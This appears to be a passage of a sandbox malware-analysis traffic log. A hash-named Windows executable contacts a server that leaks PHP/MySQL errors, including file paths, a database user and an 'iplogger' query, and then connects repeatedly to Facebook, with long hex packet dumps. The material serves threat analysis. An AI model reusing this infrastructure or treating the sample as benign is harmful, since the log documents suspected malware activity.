<b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_query() expects parameter 2 to be resource, boolean given in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>73</b><br /><font color="#000000"><b>1045 - Access denied for user 'dbnew01'@'localhost' (using password: YES)<br><br>select iplogger from t_channels where name='38b2c7a1af454d382927f81543d86055886bc02863457' limit 0,1<br><br><small><font color="#ff0000">[TEP STOP]</font></small><br><br></b></font>0
Oct 7, 2022 16:00:14.240591049 CEST	1412	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 07 Oct 2022 14:00:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 33 38 64 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 44 65 70 72 65 63 61 74 65 64 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 54 68 65 20 6d 79 73 71 6c 20 65 78 74 65 6e 73 69 6f 6e 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 77 69 6c 6c 20 62 65 20 72 65 6d 6f 76 65 64 20 69 6e 20 74 68 65 20 66 75 74 75 72 65 3a 20 75 73 65 20 6d 79 73 71 6c 69 20 6f 72 20 50 44 4f 20 69 6e 73 74 65 61 64 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 20 65 78 70 65 63 74 73 20 70 61 72 61 6d 65 74 65 72 20 32 20 74 6f 20 62 65 20 72 65 73 6f 75 72 63 65 2c 20 62 6f 6f 6c 65 61 6e 20 67 69 76 65 6e 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 37 33 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 3c 62 3e 31 30 34 35 20 2d 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 3c 62 72 3e 3c 62 72 3e 73 65 6c 65 63 74 20 69 70 6c 6f 67 67 65 72 20 66 72 6f 6d 20 74 5f 63 68 61 6e 6e 65 6c 73 20 77 68 65 72 65 20 6e 61 6d 65 3d 27 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 27 20 6c 69 6d 69 74 20 30 2c 31 3c 62 72 3e 3c 62 72 3e 3c 73 6d 61 6c 6c 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 66 66 30 30 30 30 22 3e 5b 54 45 50 20 53 54 4f 50 5d 3c 2f 66 6f 6e 74 3e 3c 2f 73 6d 61 6c 6c 3e 3c 62 72 3e 3c 62 72 3e 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 38d<br /><b>Deprecated</b>: mysql_pconnect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_pconnect(): Access denied for user 'dbnew01'@'localhost' (using password: YES) in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_query() expects parameter 2 to be resource, boolean given in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>73</b><br /><font color="#000000"><b>1045 - Access denied for user 'dbnew01'@'localhost' (using password: YES)<br><br>select iplogger from t_channels where name='38b2c7a1af454d382927f81543d86055886bc02863457' limit 0,1<br><br><small><font color="#ff0000">[TEP STOP]</font></small><br><br></b></font>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49705	157.240.20.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49707	185.60.216.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49710	31.13.92.36	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49712	185.60.216.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49714	185.60.216.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49716	185.60.216.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49718	185.60.216.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49720	185.60.216.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49701	185.60.216.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
2022-10-07 13:58:24 UTC	0	OUT	GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: www.facebook.com
2022-10-07 13:58:24 UTC	1	IN	HTTP/1.1 404 Not Found Vary: Accept-Encoding report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: same-origin cross-origin-opener-policy: same-origin-allow-popups Pragma: no-cache Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Frame-Options: DENY Strict-Transport-Security: max-age=15552000; preload Content-Type: text/html; charset="utf-8" X-FB-Debug: fq/uX1fI+8wnFpghTp1o27/tvPsvMl9SuTt7mhWvMLOKpiDQdR5EpUpNHCTKu8edASCBCBCVLCubpJZvl329LQ== Date: Fri, 07 Oct 2022 13:58:24 GMT Priority: u=3,i Transfer-Encoding: chunked Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Connection: close
2022-10-07 13:58:24 UTC	2	IN	Data Raw: 36 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 50 51 59 4b 5a 58 54 31 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 69 Data Ascii: 6191<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="default" id="meta_referrer" /><script nonce="PQYKZXT1">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requi
2022-10-07 13:58:24 UTC	3	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 29 72 65 74 75 72 6e 3b 62 2e 49 5f 41 4d 5f 49 4e 43 4f 47 4e 49 54 4f 5f 41 4e 44 5f 49 5f 52 45 41 4c 4c 59 5f 4e 45 45 44 5f 57 45 42 53 51 4c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 28 61 2c 62 2c 63 2c 64 29 7d 3b 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 29 7d 7d 62 28 61 29 7d 29 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 51 59 4b 5a 58 54 31 22 3e 3c 2f 73 74 79 Data Ascii: function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="PQYKZXT1"></sty
2022-10-07 13:58:24 UTC	4	IN	Data Raw: 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 3f 5f 66 62 5f 6e 6f 73 63 72 69 70 74 3d 31 22 20 2f 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 6c 69 Data Ascii: b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E?_fb_noscript=1" /></noscript><li
2022-10-07 13:58:24 UTC	6	IN	Data Raw: 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 Data Ascii: %23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886b
2022-10-07 13:58:24 UTC	7	IN	Data Raw: 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 Data Ascii: '@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color
2022-10-07 13:58:24 UTC	8	IN	Data Raw: 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 6f 42 2f 79 58 67 33 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 58 48 77 75 41 5f 5f 34 32 41 66 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 34 42 47 54 6d 43 37 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c Data Ascii: css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="oB/yXg3" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/XHwuA__42Af.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="4BGTmC7" /><link type="text/css" rel="styl
2022-10-07 13:58:24 UTC	10	IN	Data Raw: 34 5f 5a 51 69 30 73 54 6a 53 74 2d 52 78 5f 54 51 22 7d 2c 22 38 31 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 55 37 71 47 30 36 70 39 73 46 36 75 38 37 71 77 22 7d 2c 22 36 37 36 38 33 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6e 4e 31 65 68 54 39 79 71 2d 32 71 36 4d 46 63 22 7d 2c 22 31 32 31 37 31 35 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 42 37 59 6d 6c 6c 4f 73 41 72 6e 4b 36 4e 54 30 22 7d 2c 22 31 35 35 34 38 32 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 7a 75 65 47 4c 68 47 6f 30 63 54 35 78 4d 79 34 22 7d 2c 22 31 37 33 38 34 38 36 22 3a 7b 22 72 65 73 Data Ascii: 4_ZQi0sTjSt-Rx_TQ"},"8126":{"result":false,"hash":"AT4U7qG06p9sF6u87qw"},"676838":{"result":false,"hash":"AT6nN1ehT9yq-2q6MFc"},"1217157":{"result":false,"hash":"AT6B7YmllOsArnK6NT0"},"1554827":{"result":false,"hash":"AT7zueGLhGo0cT5xMy4"},"1738486":{"res
2022-10-07 13:58:24 UTC	11	IN	Data Raw: 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 77 64 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 78 2d 72 65 66 65 72 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 78 2d 73 72 63 22 3a 7b 22 74 22 3a 31 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 7d 2c 32 31 30 34 5d 2c 5b 22 43 75 72 72 65 6e 74 43 6f 6d 6d 75 6e 69 74 79 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 7d 2c 34 39 30 5d 2c 5b 22 43 75 72 72 65 6e 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 5b 5d 2c 7b 22 66 61 63 65 62 6f 6f 6b 64 6f 74 63 6f 6d 22 3a 74 72 75 65 2c 22 6d 65 73 73 65 6e 67 65 72 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 77 6f 72 6b 70 6c 61 63 65 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 69 6e 73 74 61 67 72 61 6d 64 6f 74 63 6f 6d 22 Data Ascii: 0,"s":"Lax"},"wd":{"t":604800,"s":"Lax"},"x-referer":{"s":"None"},"x-src":{"t":1,"s":"None"}},2104],["CurrentCommunityInitialData",[],{},490],["CurrentEnvironment",[],{"facebookdotcom":true,"messengerdotcom":false,"workplacedotcom":false,"instagramdotcom"
2022-10-07 13:58:24 UTC	13	IN	Data Raw: 65 72 73 69 6f 6e 22 3a 32 2c 22 73 68 6f 75 6c 64 5f 72 61 6e 64 6f 6d 69 7a 65 22 3a 66 61 6c 73 65 7d 2c 32 31 31 31 5d 2c 5b 22 55 73 65 72 41 67 65 6e 74 44 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 41 72 63 68 69 74 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 62 72 6f 77 73 65 72 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4d 69 6e 6f 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 62 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 64 65 76 69 63 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c Data Ascii: ersion":2,"should_randomize":false},2111],["UserAgentData",[],{"browserArchitecture":"64","browserFullVersion":null,"browserMinorVersion":null,"browserName":"Unknown","browserVersion":null,"deviceName":"Unknown","engineName":"Unknown","engineVersion":null
2022-10-07 13:58:24 UTC	14	IN	Data Raw: 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 43 4f 52 45 5f 4c 4f 47 47 45 52 22 2c 22 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 4d 41 49 4e 5f 4c 4f 47 47 45 52 22 2c 22 57 4f 52 4b 50 4c 41 43 45 5f 50 4c 41 54 46 4f 52 4d 5f 53 45 43 55 52 45 5f 41 50 50 53 5f 4d 41 49 4c 42 4f 58 45 53 22 2c 22 50 4f 43 4b 45 54 5f 4d 4f 4e 53 54 45 52 53 5f 55 50 44 41 54 45 5f 4e 41 4d 45 22 2c 22 49 43 5f 44 49 53 41 42 4c 45 5f 4d 45 52 47 45 5f 54 4f 4f 4c 5f 46 45 45 44 5f 43 48 45 43 4b 5f 46 4f 52 5f 52 45 50 4c 41 43 45 5f 53 43 48 45 44 55 4c 45 22 2c 22 41 44 53 5f 45 50 44 5f 49 4d 50 41 43 54 45 44 5f 41 44 56 45 52 54 49 53 45 52 5f 4d 49 47 52 41 54 45 5f 58 43 4f 4e 54 52 4f 4c 4c 45 52 22 2c 22 52 45 43 52 55 49 54 49 4e 47 5f 43 41 4e 44 49 44 41 Data Ascii: SRT_BANZAI_SRT_CORE_LOGGER","SRT_BANZAI_SRT_MAIN_LOGGER","WORKPLACE_PLATFORM_SECURE_APPS_MAILBOXES","POCKET_MONSTERS_UPDATE_NAME","IC_DISABLE_MERGE_TOOL_FEED_CHECK_FOR_REPLACE_SCHEDULE","ADS_EPD_IMPACTED_ADVERTISER_MIGRATE_XCONTROLLER","RECRUITING_CANDIDA
2022-10-07 13:58:24 UTC	16	IN	Data Raw: 2e 73 6b 79 2e 63 6f 6d 22 2c 22 67 72 61 70 68 69 74 65 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 22 2c 22 77 77 77 2e 6b 66 63 2e 63 6f 2e 74 68 22 2c 22 6c 65 61 72 6e 2e 70 61 6e 74 68 65 6f 6e 2e 69 6f 22 2c 22 77 77 77 2e 6c 61 6e 64 6d 61 72 6b 73 68 6f 70 73 2e 69 6e 22 2c 22 77 77 77 2e 6e 63 6c 2e 63 6f 6d 22 2c 22 73 30 2e 77 70 2e 63 6f 6d 22 2c 22 77 77 77 2e 74 61 74 61 63 6c 69 71 2e 63 6f 6d 22 2c 22 62 73 2e 73 65 72 76 69 6e 67 2d 73 79 73 2e 63 6f 6d 22 2c 22 6b 6f 68 6c 73 2e 63 6f 6d 22 2c 22 6c 61 7a 61 64 61 2e 63 6f 2e 74 68 22 2c 22 78 67 34 6b 65 6e 2e 63 6f 6d 22 2c 22 74 65 63 68 6e 6f 70 61 72 6b 2e 72 75 22 2c 22 6f 66 66 69 63 65 64 65 70 6f 74 2e 63 6f 6d 2e 6d 78 22 2c 22 62 65 73 74 62 75 79 2e 63 6f 6d 2e 6d 78 22 2c 22 Data Ascii: .sky.com","graphite.instagram.com","www.kfc.co.th","learn.pantheon.io","www.landmarkshops.in","www.ncl.com","s0.wp.com","www.tatacliq.com","bs.serving-sys.com","kohls.com","lazada.co.th","xg4ken.com","technopark.ru","officedepot.com.mx","bestbuy.com.mx","
2022-10-07 13:58:24 UTC	17	IN	Data Raw: 29 22 2c 22 5c 2f 5f 45 5c 2f 22 3a 22 28 5b 2e 2c 21 3f 5c 5c 73 5d 7c 24 29 22 7d 2c 22 70 61 74 74 65 72 6e 73 22 3a 7b 22 5c 2f 5c 75 30 30 30 31 28 2e 2a 29 28 27 7c 26 23 30 33 39 3b 29 73 5c 75 30 30 30 31 28 3f 3a 27 7c 26 23 30 33 39 3b 29 73 28 2e 2a 29 5c 2f 22 3a 22 5c 75 30 30 30 31 24 31 24 32 73 5c 75 30 30 30 31 24 33 22 2c 22 5c 2f 5f 5c 75 30 30 30 31 28 5b 5e 5c 75 30 30 30 31 5d 2a 29 5c 75 30 30 30 31 5c 2f 22 3a 22 6a 61 76 61 73 63 72 69 70 74 22 7d 7d 2c 31 34 39 36 5d 2c 5b 22 49 6e 74 6c 56 69 65 77 65 72 43 6f 6e 74 65 78 74 22 2c 5b 5d 2c 7b 22 47 45 4e 44 45 52 22 3a 33 2c 22 72 65 67 69 6f 6e 61 6c 4c 6f 63 61 6c 65 22 3a 6e 75 6c 6c 7d 2c 37 37 32 5d 2c 5b 22 4e 75 6d 62 65 72 46 6f 72 6d 61 74 43 6f 6e 66 69 67 22 2c 5b 5d Data Ascii: )","\/_E\/":"([.,!?\\s]\|$)"},"patterns":{"\/\u0001(.)('\|')s\u0001(?:'\|')s(.)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u0001\/":"javascript"}},1496],["IntlViewerContext",[],{"GENDER":3,"regionalLocale":null},772],["NumberFormatConfig",[]
